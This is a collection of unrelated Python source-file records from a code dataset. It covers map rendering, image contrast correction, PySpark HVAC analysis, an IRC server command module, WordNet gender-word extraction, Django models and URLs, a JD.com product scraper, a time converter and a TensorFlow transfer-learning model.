\n\n \n \n\n \n \n \n\n\n
\n\n
Color code explanation
\n
\n
    \n
  • Over 100% of capacity
  • \n
  • Between 90% and 100% of capacity
  • \n
  • Between 50% and 90% of capacity
  • \n
  • Less than 50% of capacity
  • \n\n
\n
\n
\n\n \n \n\n \n {% endmacro %}\"\"\"\n\n macro = MacroElement()\n macro._template = Template(template)\n m.get_root().add_child(macro)\n \n return m\n","sub_path":"src/optimization_pulp/read_data_for_optimization_pulp.py","file_name":"read_data_for_optimization_pulp.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"516962308","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 6 13:53:16 2020\n\n@author: DANILO\n\"\"\"\n\nimport numpy as np\n\ndef pdf(arr): \n min_value = np.min(arr)\n max_value = np.max(arr)\n \n pdf_distr = np.zeros(max_value+1) \n \n for g in range(min_value,max_value):\n pdf_distr[g] = len(arr[arr == g])\n \n return pdf_distr\n\ndef pdf_w(pdf_distr,alpha=0.3):\n distr_len = len(pdf_distr)\n \n pdf_w_distr = np.zeros(distr_len)\n \n pdf_min = np.min(pdf_distr)\n pdf_max = np.max(pdf_distr)\n \n for g in range(distr_len):\n pdf_w_distr[g] = pdf_max*np.power(((pdf_distr[g] - pdf_min) / (pdf_max - pdf_min)),alpha)\n \n return pdf_w_distr\n\ndef cdf_w(pdf_w_distr):\n distr_len = len(pdf_w_distr)\n \n cdf_w_distr = np.zeros(distr_len)\n \n sum_pdf = np.sum(pdf_w_distr)\n \n for g in range(distr_len):\n cdf_w_distr[g] = np.sum(pdf_w_distr[0:g+1]) / sum_pdf\n \n return cdf_w_distr\n\ndef contrast_correction(img):\n arr = img.flatten()\n \n new_img = np.zeros((img.shape[0],img.shape[1]))\n \n pdf_distr = pdf(arr)\n pdf_w_distr = pdf_w(pdf_distr,alpha=1)\n \n cdf_w_distr = cdf_w(pdf_w_distr) \n l_max = np.max(arr)\n \n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n new_img[i][j] = l_max * np.power((img[i][j] / l_max),1-cdf_w_distr[img[i][j]])\n \n return new_img.astype(np.uint8)\n\n\n ","sub_path":"utils/agcwd.py","file_name":"agcwd.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"478777882","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructField\nfrom pyspark.sql.types import StructType\nfrom pyspark.sql.types import StringType \nfrom pyspark.sql.types import IntegerType \nfrom pyspark.sql.functions import desc\nimport matplotlib.pyplot as plt \n\n\ndef main(spark):\n fields=[StructField(\"Date\", StringType(), True),\\\n StructField(\"Time\", StringType(), True),\\\n StructField(\"TargetTemp\", IntegerType(), True),\\\n StructField(\"ActualTemp\", IntegerType(), True),\\\n StructField(\"System\", IntegerType(), True),\\\n StructField(\"SystemAge\", IntegerType(), True),\\\n StructField(\"BuildingId\", IntegerType(), True)]\n schema = StructType(fields)\n hvacdf = spark.read.format(\"csv\").option(\"header\",\"true\").schema(schema).load(\"c:\\\\sparksqlucs\\\\HVAC.csv\")\n hvacdf.registerTempTable(\"HVAC\")\n hvacWithFlag1 = spark.sql(\"select *,IF((targettemp - actualtemp) > 5, '1', IF((targettemp - actualtemp) < -5, '1', 0)) AS tempchange from HVAC\")\n hvacWithFlag1.registerTempTable(\"HVAC1\")\n Buildingfields=[StructField(\"BuildingID\", IntegerType(), True),\\\n StructField(\"BuildingMgr\", StringType(), True),\\\n StructField(\"BuildingAge\", IntegerType(), True),\\\n StructField(\"HVACproduct\", StringType(), True),\\\n StructField(\"Country\", StringType(), True)]\n Buildingschema = StructType(Buildingfields)\n Buildingdf = spark.read.format(\"csv\").option(\"header\",\"true\").schema(Buildingschema).load(\"c:\\\\sparksqlucs\\\\building.csv\")\n Buildingdf.registerTempTable(\"building\")\n buildingWithHvac = spark.sql(\"select h.*, b.country, b.hvacproduct from building b join hvac1 h on b.BuildingId = h.Buildingid\")\n buildingWithHvac.show()\n buildingWithHvac.registerTempTable(\"buildingWithHvacDetails\")\n countryWithTemparatureFlag= buildingWithHvac.filter(buildingWithHvac[\"tempchange\"]==\"1\")\n countrieswithTempchange=countryWithTemparatureFlag.groupBy(\"country\").count()\n countrieswithTempchangeOften=countrieswithTempchange.sort(desc(\"count\"))\n countrieswithTempchangeOften.show()\n Top2SystemAgeCountryWise=spark.sql(\"select country, SystemAge FROM \\\n ( SELECT country,SystemAge,dense_rank() OVER \\\n (PARTITION BY country ORDER BY SystemAge DESC) as rank \\\n FROM buildingWithHvacDetails ) tmp WHERE rank <= 2 \")\n Top2SystemAgeCountryWise.distinct().show()\n Lowest2SystemAgeCountryWise=spark.sql(\"select country, SystemAge FROM \\\n ( SELECT country,SystemAge,dense_rank() OVER \\\n (PARTITION BY country ORDER BY SystemAge asc) as rank \\\n FROM buildingWithHvacDetails ) tmp WHERE rank <= 2 \")\n Lowest2SystemAgeCountryWise.distinct().show()\n CountryLabel=countrieswithTempchangeOften.rdd.map(lambda x : x[\"country\"]).collect()\n Count=countrieswithTempchangeOften.rdd.map(lambda x : x[\"count\"]).collect()\n #creating a pie chart using matplot to visualize the final outcome (countries with frequent temperature changes)\n explode = (0.3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.3)\n plt.pie(Count, labels=CountryLabel,explode=explode,autopct= lambda p : '{:.2f}% \\n({:d})'.format(p,int(round(p * sum(Count)/100))))\n plt.show()\n \nif __name__ == \"__main__\" :\n spark = SparkSession.builder.appName(\"Temperature Change across world\")\\\n .getOrCreate()\n main(spark)\n ","sub_path":"Frequent_Temperature_Changes.py","file_name":"Frequent_Temperature_Changes.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"75950554","text":"from twisted.plugin import IPlugin\nfrom twisted.words.protocols import irc\nfrom txircd.module_interface import Command, ICommand, IModuleData, ModuleData\nfrom zope.interface import implementer\nfrom typing import Any, Dict, List, Optional, Tuple\n\nirc.ERR_SERVICES = \"955\" # Custom numeric; 955 \n\n@implementer(IPlugin, IModuleData, ICommand)\nclass AccountName(ModuleData, Command):\n\tname = \"AccountName\"\n\t\n\tdef userCommands(self) -> List[Tuple[str, int, Command]]:\n\t\treturn [ (\"ACCOUNTNAME\", 1, self) ]\n\t\n\tdef parseParams(self, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\tif not params or not params[0]:\n\t\t\tuser.sendSingleError(\"AccountNameParams\", irc.ERR_NEEDMOREPARAMS, \"ACCOUNTNAME\", \"Not enough parameters\")\n\t\t\treturn None\n\t\treturn {\n\t\t\t\"name\": params[0]\n\t\t}\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\tuserAccount = user.metadataValue(\"account\")\n\t\tif not userAccount:\n\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"NAME\", \"NOTLOGIN\")\n\t\t\tuser.sendMessage(\"NOTICE\", \"You're not logged in.\")\n\t\t\treturn True\n\t\tnameChangeResult = self.ircd.runActionUntilValue(\"accountchangename\", userAccount, data[\"name\"])\n\t\tif not nameChangeResult:\n\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"NAME\", \"NOACCOUNT\")\n\t\t\tuser.sendMessage(\"NOTICE\", \"This server doesn't have accounts set up.\")\n\t\t\treturn True\n\t\tif nameChangeResult[0]:\n\t\t\tuser.sendMessage(\"NOTICE\", \"Your account name has been updated.\")\n\t\t\treturn True\n\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"NAME\", nameChangeResult[1])\n\t\tuser.sendMessage(\"NOTICE\", \"Couldn't set your account name: {}\".format(nameChangeResult[2]))\n\t\treturn True\n\nnameChangeCommand = AccountName()","sub_path":"txircd/modules/extra/services/account_name.py","file_name":"account_name.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"173522388","text":"# %% imports\n\nfrom IPython import get_ipython\nget_ipython().run_line_magic('matplotlib', 'osx')\nimport nltk\nnltk.download('wordnet')\nfrom tqdm import tqdm\nfrom nltk.corpus import wordnet as wn\nimport yaml\nimport spacy\nimport lemminflect\nfrom multiprocessing import Pool\nimport re\n\n# %% FUNCTIONS\n\nnlp = spacy.load(\"en_core_web_sm\")\nfemale_lookup_words = [\"female\", \"woman\", \"women\", \"girl\", \"sister\", \"daughter\", \"mother\", \"mom\", \"grandmother\", \"wife\"]\nmale_lookup_words = [\"male\", \"man\", \"men\", \"boy\", \"brother\", \"son\", \"father\", \"dad\", \"grandfather\", \"husband\"]\n\n\ndef get_gender(vocab, verbose=False):\n # vocab should be a set of words that have at least one synset in wordnet\n fwords = {}\n mwords = {}\n nwords = {}\n\n for token in tqdm(vocab, total=len(vocab), desc='Getting gender from WN'):\n if len(token) == 1:\n # removing single consonant\n continue\n if any([len(re.findall(r\"\\b{}s?\\b\".format(pattern), token)) for pattern in female_lookup_words]):\n fwords[token] = wn.synsets(token)[0].definition()\n elif any([len(re.findall(r\"\\b{}s?\\b\".format(pattern), token)) for pattern in male_lookup_words]):\n mwords[token] = wn.synsets(token)[0].definition()\n else:\n definition = wn.synsets(token)[0].definition() # the first synset is supposed to be most used definition\n male_freq = sum([len(re.findall(r\"\\b{}s?\\b\".format(pattern), definition)) for pattern in male_lookup_words])\n female_freq = sum([len(re.findall(r\"\\b{}s?\\b\".format(pattern), definition)) for pattern in female_lookup_words])\n if male_freq > female_freq:\n mwords[token] = definition\n elif male_freq == female_freq:\n nwords[token] = definition\n else:\n fwords[token] = definition\n if verbose:\n print(f\"len of mwords: {len(mwords)} --- len of fwords: {len(fwords)} --- len of nwords: {len(nwords)}\")\n\n with open(\"./data/female_words.yaml\", \"w\") as ff:\n yaml.dump(fwords, ff)\n with open(\"./data/male_words.yaml\", \"w\") as ff:\n yaml.dump(mwords, ff)\n with open(\"./data/neutral_words.yaml\", \"w\") as ff:\n yaml.dump(nwords, ff)\n\n return fwords, mwords, nwords\n\n\ndef extract_words(filename, vocab, wn_vocab, mode='r'):\n assert type(vocab) is set, \"vocab argument should be set\"\n assert type(wn_vocab) is set, \"wn_vocab argument should be set\"\n\n with open(filename, mode) as f_in:\n fname = filename.split(\"/\")[-1]\n for sentence in tqdm(f_in, f\"File {fname}: \"):\n sent = nlp(sentence)\n for token in sent:\n if token.is_stop or not token.is_alpha:\n continue\n lemma = token._.lemma().lower()\n if lemma not in vocab:\n vocab.add(lemma)\n else:\n continue\n w_synsets = wn.synsets(lemma)\n if w_synsets and lemma not in wn_vocab:\n wn_vocab.add(lemma)\n return vocab, wn_vocab\n\n\n# %% main\n\nFNAME_TRAINING = '/Users/kbello/Downloads/gender_data/training/news.en-000{}{}-of-00100'\nFNAME_HELDOUT = '/Users/kbello/Downloads/gender_data/heldout/'\nFNAME_PLAIN_WORDS = './data/lemmatized_words.txt'\nFNAME_NOT_FOUND = './data/not_found_words.txt'\nNCORES = 8\nresults = {}\n\n\ndef main():\n r_id = 0\n pool = Pool(NCORES)\n\n for i in tqdm(range(1, 48)):\n r_id += 1\n results[r_id] = pool.apply_async(\n extract_words,\n args=(FNAME_TRAINING.format(i//10, i%10), set(), set()),\n ) \n\n r_id += 1\n results[r_id] = pool.apply_async(\n extract_words,\n args=(FNAME_HELDOUT + 'news.en-00000-of-00100', set(), set()),\n ) \n \n for i in tqdm(range(50)):\n r_id += 1\n results[r_id] = pool.apply_async(\n extract_words,\n args=(FNAME_HELDOUT + 'news.en.heldout-000{}{}-of-00050'.format(i//10, i%10), set(), set()),\n )\n \n print(f\"total # of files analyzed: {r_id}\")\n\n pool.close()\n pool.join()\n\n vocab, wn_vocab = set(), set()\n for _, result in tqdm(results.items(), total=r_id):\n vocab_idx, wn_vocab_idx = result.get()\n vocab = vocab.union(vocab_idx)\n wn_vocab = wn_vocab.union(wn_vocab_idx)\n\n with open(\"./data/wn_vocab.yaml\", \"w\") as ff:\n yaml.dump(wn_vocab, ff)\n \n with open(\"./data/all_vocab.yaml\", \"w\") as ff:\n yaml.dump(vocab, ff)\n\n print(f\"# of words in total: {len(vocab)}\")\n print(f\"# of words in wordnet: {len(wn_vocab)}\")\n\n\n\n\n# %%\n\n\n\n# %%\n\nif __name__ == \"__main__\":\n main()","sub_path":"1Bwords_preprocess.py","file_name":"1Bwords_preprocess.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"317240539","text":"from django.contrib.postgres.fields import JSONField\nfrom django.db import models\nfrom django.utils.functional import cached_property\n\nfrom db.models.abstract_jobs import AbstractJobStatus, JobMixin\nfrom db.models.plugins import PluginJobBase\nfrom db.models.unique_names import TENSORBOARD_UNIQUE_NAME_FORMAT\nfrom libs.spec_validation import validate_tensorboard_spec_config\nfrom schemas.specifications import TensorboardSpecification\n\n\nclass TensorboardJob(PluginJobBase, JobMixin):\n \"\"\"A model that represents the configuration for tensorboard job.\"\"\"\n project = models.ForeignKey(\n 'db.Project',\n on_delete=models.CASCADE,\n related_name='tensorboard_jobs')\n config = JSONField(\n help_text='The compiled polyaxonfile for the tensorboard job.',\n validators=[validate_tensorboard_spec_config])\n experiment_group = models.ForeignKey(\n 'db.ExperimentGroup',\n on_delete=models.CASCADE,\n related_name='tensorboard_jobs',\n null=True,\n blank=True)\n experiment = models.ForeignKey(\n 'db.Experiment',\n on_delete=models.CASCADE,\n related_name='tensorboard_jobs',\n null=True,\n blank=True)\n status = models.OneToOneField(\n 'db.TensorboardJobStatus',\n related_name='+',\n blank=True,\n null=True,\n editable=True,\n on_delete=models.SET_NULL)\n\n class Meta:\n app_label = 'db'\n\n @cached_property\n def unique_name(self):\n return TENSORBOARD_UNIQUE_NAME_FORMAT.format(\n project_name=self.project.unique_name,\n id=self.id)\n\n @cached_property\n def specification(self):\n return TensorboardSpecification(values=self.config)\n\n def set_status(self, # pylint:disable=arguments-differ\n status,\n message=None,\n traceback=None,\n details=None):\n return self._set_status(status_model=TensorboardJobStatus,\n status=status,\n message=message,\n traceback=traceback,\n details=details)\n\n @cached_property\n def outputs_path(self):\n if self.experiment:\n from libs.paths.experiments import get_experiment_outputs_path\n return get_experiment_outputs_path(\n persistence_outputs=self.experiment.persistence_outputs,\n experiment_name=self.experiment.unique_name,\n original_name=self.experiment.original_unique_name,\n cloning_strategy=self.experiment.cloning_strategy)\n if self.experiment_group:\n from libs.paths.experiment_groups import get_experiment_group_outputs_path\n return get_experiment_group_outputs_path(\n persistence_outputs=self.experiment_group.persistence_outputs,\n experiment_group_name=self.experiment_group.unique_name)\n\n from libs.paths.projects import get_project_outputs_path\n return get_project_outputs_path(persistence_outputs=None,\n project_name=self.project.unique_name)\n\n\nclass TensorboardJobStatus(AbstractJobStatus):\n \"\"\"A model that represents tensorboard job status at certain time.\"\"\"\n job = models.ForeignKey(\n 'db.TensorboardJob',\n on_delete=models.CASCADE,\n related_name='statuses')\n\n class Meta(AbstractJobStatus.Meta):\n app_label = 'db'\n verbose_name_plural = 'Tensorboard Job Statuses'\n","sub_path":"polyaxon/db/models/tensorboards.py","file_name":"tensorboards.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"401289985","text":"#!/usr/bin/env python\n\n# Copyright 2019 Google, LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import Error\n\nclient_service = build('jobs', 'v3')\nproject_id = 'projects/' + os.environ['GOOGLE_CLOUD_PROJECT']\n\n\ndef list_everything():\n try:\n response = client_service.projects().companies().list(\n parent=project_id).execute()\n if response.get('companies') is not None:\n print('Companies and Jobs:')\n for company in response.get('companies'):\n print('%s: %s' % (company.get('displayName'),\n company.get('name')))\n jobs_response = client_service.projects().jobs().list(\n parent=project_id,\n filter='companyName=\"' + company.get('name') + '\"'\n ).execute()\n if jobs_response.get('jobs') is not None:\n for job in jobs_response.get('jobs'):\n print('- %s: %s' % (\n job.get('title'),\n job.get('name')))\n else:\n print('No companies')\n\n except Error as e:\n print('Got exception while listing everything')\n raise e\n\n\nlist_everything()\n","sub_path":"jobs-and-companies-codelab/list_everything.py","file_name":"list_everything.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"525501917","text":"\"\"\"\n///////////////////////////////////////////////////////\n│\t\n│\tFilename:\tautomate_1_verify_gz.py\n│\tDescription:\n│\tTo verify the integrity of .gz files in directory\n│\tand print the corrupted ones' file names.\n│\t==================================================\n│\tAuthorship:\t@cgneo\n│\tCopyright:\tModified BSD License.\n│\tMade with love by https://github.com/cgneo\n│\t\n///////////////////////////////////////////////////////\n\"\"\"\n\n\nimport os\nimport gzip\nfrom auto_print_progress import printProgressBar\n\n\n\"\"\"\n│\t(optional):\n│\tPlease choose the directory containing .gz files for database:\n│\tFor example:\n│\tdirectory = './hgtdb'\n\"\"\"\n#============================================================\ndirectory = './'\n#============================================================\nsuccess = 0\nfailed = 0\nall_file = 0\nlist_of_files = []\nfor root, subdirectories, files in os.walk(directory):\n\tsubdirectories.sort()\n\tfor file in files:\n\t\tname, extension = os.path.splitext(file)\n\t\tif extension == '.gz':\n\t\t\tlist_of_files.append(os.path.join(root, file))\n\nprint(f'Finish scaning: {len(list_of_files)} .gz files in total.')\n\n\nfor i in range(len(list_of_files)):\n\tline_count_test = 0\n\ttry:\n\t\tfin = gzip.open(list_of_files[i], 'rt')\n\t\tfor line in fin:\n\t\t\tline_count_test += 1\n\t\t\tif line_count_test >= 2: break\n\t\tsuccess += 1\n\texcept Exception as e:\n\t\tfailed += 1\n\t\tprint(f'failed at {file}: {e}')\n\t\n\tall_file += 1\n\tprintProgressBar(i+1, len(list_of_files), prefix='Progress:', suffix=list_of_files[i], length=30)\n\nprint()\nprint(f'Sucesss: {success}/{all_file}, Failed: {failed}/{all_file}')","sub_path":"automate_1_verify_gz.py","file_name":"automate_1_verify_gz.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"85167187","text":"from django.conf.urls import patterns, include, url\nfrom adm.empresa.views import *\nfrom adm.endereco.views import ListEstadoView, CreateEstadoView, UpdateEstadoView, DeleteEstadoView, ListCidadeView, \\\n CreateCidadeView, UpdateCidadeView, DeleteCidadeView\n\n__author__ = 'mattyws'\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'VoteCompras.views.home', name='home'),\n url(r'^estado/$', ListEstadoView.as_view(), name='estados'),\n url(r'^estado/form/$', CreateEstadoView.as_view(), name='adicionar_estado'),\n url(r'^estado/form/(?P[0-9]+)/$', UpdateEstadoView.as_view(), name='editar_estado'),\n url(r'^estado/delete/(?P[0-9]+)/$', DeleteEstadoView.as_view(), name='deletar_estado'),\n)\n\nurlpatterns += patterns('',\n # Examples:\n # url(r'^$', 'VoteCompras.views.home', name='home'),\n url(r'^cidade/$', ListCidadeView.as_view(), name='cidades'),\n url(r'^cidade/form/$', CreateCidadeView.as_view(), name='adicionar_cidade'),\n url(r'^cidade/form/(?P[0-9]+)/$', UpdateCidadeView.as_view(), name='editar_cidade'),\n url(r'^cidade/delete/(?P[0-9]+)/$', DeleteCidadeView.as_view(), name='deletar_cidade'),\n)","sub_path":"adm/endereco/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"257205889","text":"\n#爬取京东数据\n#----编码不同害死人!!!傻逼编码gbk!傻逼微软!\n\nimport codecs \nfrom lxml import etree\nfrom urllib import request\nimport urllib\n\ndef getDetail(url):\n print(url)\n page=request.urlopen(url).read().decode('gbk')\n tree=etree.HTML(page)\n table=tree.xpath('//div[@id=\"product-detail-2\"]/table/tr')\n for table_tr in table:\n tr=table_tr.getchildren()\n if len(tr)==1:\n print(tr[0].text)\n elif len(tr)==2:\n print(tr[0].text,' ',tr[1].text)\n\ndef start():\n url='http://search.jd.com/Search?keyword=%E6%89%8B%E6%9C%BA&enc=utf-8&wq=%E6%89%8B%E6%9C%BA&pvid=8k7efomi.57bjs'\n page=request.urlopen(url).read().decode('utf-8')\n tree=etree.HTML(page)\n\n nodes=tree.xpath(\"//div[@class='gl-i-wrap']\")\n\n item_list=[]\n for node in nodes:\n try:\n href=node.xpath(\"./div/a\")[0].attrib['href']\n name=node.xpath(\"./div/a/em\")[0].text\n #不知道为什么,有的价格在网页源代码是不显示的,但是在查看元素一栏上是可以显示的·\n #很明显一个问题是,那些报错的物品,他的href都是http://开头的,而不像其他正常的那样\n price=node.xpath(\"./div/strong/i\")[0].text\n\n item_list.append((name,price,href))\n except:\n print('there is a error')\n return item_list\n \n \n \nif __name__ == '__main__':\n itemlist=start()\n for (n,p,h) in item_list:\n print(n,p,h)\n '''\n try:\n getDetail(h)\n except:\n print('read url fild or decode fild!')\n '''\n url=\"http:\"+h\n getDetail(url)\n print('----------------------------------------------世界和平-----------------------------------------------------------------')","sub_path":"jingdong-total.py","file_name":"jingdong-total.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"625005253","text":"def conversor(n1,n2):\n if n1 > 24 or n2>59 or (n1 or n2 <0):\n n1 = -1\n n2 = -1\n conv = \"Horário inválido!\"\n elif n1 < 12 or n1 ==24:\n if n1 == 24:\n n1 = 0\n conv = \"AM\"\n elif n1 > 12 and n2 >=1:\n conv = \"PM\"\n for i in range(1,(n1+1)-12):\n n1 = i\n return (n1,n2,conv)\nh = None\nwhile h != -1:\n h = int(input(\"Digite a hora: \"))\n m = int(input(\"Digite os minutos: \"))\n a,b,c= conversor(h,m)\n if a == -1:\n print(c)\n else:\n print(\"%i:%i %s\" %(a,b,c))\n \n\n","sub_path":"backup/Ignorância Zero-backup/Ignorância Zero/033Exercício6.py","file_name":"033Exercício6.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"627669426","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim.python.slim.nets.inception_v2 import inception_v2\nfrom tensorflow.contrib.slim.python.slim.nets.inception_v2 import inception_v2_arg_scope as inception_v2_arg_scope\nfrom generate_batch import generate_stochastic_train_batch, generate_stochastic_valid_batch, generate_stochastic_test_batch\n\n\nclass transferLearningModel:\n def __init__(self):\n self.using_inception = True\n self.train_picture = 21303\n self.height = 224\n self.width = 224\n self.batch_size = 50\n self.label_num = 102\n self.learning_rate = 0.0001\n self.w_len = 1001\n self.fc_len = 256\n self.onehot = self.generatelabel()\n self.max_acc_save = 0\n self.is_training = tf.placeholder(tf.bool, name='is_training')\n self.is_from_previous = False\n\n self.img_input = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.height, self.width, 3], name='input')\n #self.img_input_expand = tf.expand_dims(self.img_input, -1)\n self.img_input_expand = self.img_input\n self.label_id = tf.compat.v1.placeholder(dtype=tf.int32, shape=[None], name='label')\n self.label_onehot = tf.nn.embedding_lookup(self.onehot, self.label_id)\n self.keep_prob = tf.compat.v1.placeholder(tf.float32, name='keep_prob')\n\n if self.using_inception:\n self.feature_vector = self.inception_v2_layer() #特征向量\n else:\n self.feature_vector = self.vgg_layer()\n self.full_connect_out = self.full_connect_layer() #用于生成哈希码及分类\n self.output_class = self.softmax_layer() #分类结果\n self.output_hash = self.hash_layer() #哈希结果\n\n self.loss = self.get_loss()\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(self.output_class, 1), tf.argmax(self.label_onehot, 1)), tf.float32), name=\"my_accuracy\")\n\n self.optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)\n if self.using_inception:\n update_ops = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train_op = self.optimizer.minimize(self.loss)\n else:\n self.train_op = self.optimizer.minimize(self.loss)\n self.saver = tf.compat.v1.train.Saver()\n\n inception_except_logits = slim.get_variables_to_restore(exclude=['Inceptionv2/Logits','Inceptionv2/AuxLogits'])\n self.loaded_weights = slim.assign_from_checkpoint_fn(\"models/inception_v2.ckpt\", inception_except_logits, ignore_missing_vars=True)\n # self.loaded_weights = slim.assign_from_checkpoint_fn(\"models/inception_v2.ckpt\",inception_except_logits)\n self.summ = tf.norm(self.output_class,ord=1)\n self.the_class = tf.argmax(self.output_class,1)\n\n\n def generatelabel(self):\n return np.identity(self.label_num)\n\n def inception_v2_layer(self):\n out_dimension = self.w_len\n with slim.arg_scope(inception_v2_arg_scope()):\n out, _ = inception_v2(inputs=self.img_input_expand, num_classes=out_dimension,\n dropout_keep_prob=self.keep_prob,is_training=self.is_training)\n return out\n\n def vgg_layer(self):\n conv1 = self.conv_layer([3,3,1,64],[64],self.img_input_expand,1) #222*222*64\n conv2 = self.conv_layer([3,3,64,64],[64],conv1,2) ##220*220*64\n pool1 = tf.nn.max_pool(conv2, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID') #110*110*64\n conv2 = self.conv_layer([3, 3, 64, 128], [128], pool1, 3) #108*108*128\n conv4 = self.conv_layer([3,3,128,128],[128], conv2, 4) #106*106*128\n pool2 = tf.nn.max_pool(conv4, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')#53*53*128\n conv5 = self.conv_layer([3,3,128,256],[256],pool2, 5) #51*51*256\n conv6 = self.conv_layer([3,3,256,256],[256], conv5, 6) #49*49*256\n pool3 = tf.nn.max_pool(conv6, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 25*25*256\n conv7 = self.conv_layer([3, 3, 256, 256], [256], pool3, 5) # 23*23*256\n conv8 = self.conv_layer([3, 3, 256, 256], [256], conv7, 6) # 21*21*256\n pool4 = tf.nn.max_pool(conv8, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 11*11*256\n conv9 = self.conv_layer([3, 3, 256, 256], [256], pool4, 5) # 9*9*256\n conv10 = self.conv_layer([3, 3, 256, 256], [256], conv9, 6) # 7*7*256\n pool5 = tf.nn.max_pool(conv10, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 4*4*256\n\n flat = tf.reshape(pool5,[-1,4*4*256])\n wfc = self.get_variable([4*4*256,1000],\"vgg_fc_w\")\n bfc = self.get_variable([1000], \"vgg_fc_b\")\n out = tf.nn.relu(tf.matmul(flat, wfc)+bfc)\n return out\n\n\n def conv_layer(self,wshape,bshape,input,num):\n W = self.get_variable(wshape, \"conv_w\"+str(num))\n b = self.get_variable(bshape, \"conv_b\"+str(num))\n h = tf.nn.relu(tf.nn.conv2d(input, W, strides=[1, 1, 1, 1], padding='VALID') + b);\n h_dropout = tf.nn.dropout(h, keep_prob=self.keep_prob)\n return h_dropout\n\n def get_variable(self,shape,name):\n return tf.Variable(initial_value=tf.random.truncated_normal(shape,mean=0,stddev=0.01),name=name)\n\n def full_connect_layer(self):\n W_fc = tf.Variable(initial_value=tf.random.truncated_normal([self.w_len, self.fc_len], mean=0, stddev=0.01),name=\"full_connect_w\");\n b_fc = tf.Variable(initial_value=tf.random.truncated_normal([self.fc_len], mean=0, stddev=0.01),name=\"full_connect_b\");\n h_fc = tf.tanh(tf.matmul(self.feature_vector, W_fc) + b_fc);\n h_fc1_dropout = tf.nn.dropout(h_fc, self.keep_prob, name=\"feature_vector\");\n return h_fc1_dropout\n\n def hash_layer(self):\n pass\n\n def softmax_layer(self):\n W_s = tf.Variable(initial_value=tf.random.truncated_normal([self.fc_len, self.label_num], mean=0, stddev=0.01));\n b_s = tf.Variable(initial_value=tf.random.truncated_normal([self.label_num], mean=0, stddev=0.01));\n h_s= tf.nn.softmax(tf.matmul(self.full_connect_out, W_s) + b_s, name=\"out_class\");\n return h_s\n\n def get_loss(self):\n #alpha = 0.01\n cross_entropy = tf.compat.v1.losses.softmax_cross_entropy(onehot_labels=self.label_onehot, logits=self.output_class)\n #full_connect_output_norm = tf.norm(self.full_connect_out,axis=1)\n #tf.compat.v1.losses.add_loss(tf.reduce_mean(62-full_connect_output_norm)*alpha)\n tf.compat.v1.losses.add_loss(cross_entropy)\n return tf.compat.v1.losses.get_total_loss(add_regularization_losses=True)\n\n def train(self,):\n max_epoch = 10000\n with tf.compat.v1.Session() as sess:\n if self.is_from_previous:\n module_file = tf.compat.v1.train.latest_checkpoint(\"models/\")\n self.saver.restore(sess, module_file)\n max_accuracy = 0.4\n else:\n sess.run(tf.compat.v1.global_variables_initializer())\n max_accuracy = 0\n self.loaded_weights(sess)\n for i in range(1, max_epoch):\n train_batch = generate_stochastic_train_batch(self.batch_size, True)\n for step,batch in enumerate(train_batch):\n (img_batch, label_batch) = batch\n sess.run(self.train_op, 